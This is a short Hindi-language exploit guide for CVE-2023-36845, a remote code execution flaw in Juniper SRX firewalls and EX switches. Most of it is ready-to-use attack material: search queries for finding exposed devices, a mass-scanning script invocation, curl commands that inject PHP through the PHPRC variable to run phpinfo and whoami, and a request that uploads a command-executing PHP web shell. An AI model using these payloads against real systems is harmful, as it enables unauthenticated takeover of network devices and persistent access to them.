
जुनिपर फ़ायरवॉल CVE-2023-36845 - RCE
CVE-2023-36845 एक उल्लेखनीय PHP वातावरण चर हेरफेर भेद्यता है जो Juniper SRX फ़ायरवॉल और EX स्विच को प्रभावित करती है। जबकि Juniper ने इस भेद्यता को मध्यम गंभीरता के रूप में वर्गीकृत किया है, इस लेख में हम समझाएंगे कि कैसे इस एकल भेद्यता का उपयोग दूरस्थ, अप्रमाणित कोड निष्पादन के लिए किया जा सकता है।
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
पता लगाना
python3 CVE-2023-36845.py -f targets.txt -o output.txt
किसी भी प्रोटोकॉल रैपर का auto_prepend_file के साथ उपयोग संभव है। इस ऑपरेशन के लिए सबसे उपयुक्त विकल्प data:// प्रोटोकॉल है, जो "द्वितीयक फ़ाइल" को इनलाइन प्रदान करने की अनुमति देता है। यहाँ इस शोषण का एक परिष्कृत प्रतिनिधित्व है, जो data:// योजना के भीतर एम्बेडेड <? phpinfo(); ?> को निष्पादित करता है:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
whoami कमांड निष्पादित करें
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
एक फ़ाइल अपलोड करें
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| पैरामीटर | विवरण | प्रकार |
|---|---|---|
| --file / -f | इनपुट लक्ष्य फ़ाइल | फ़ाइल |
| -o | आउटपुट फ़ाइल | फ़ाइल |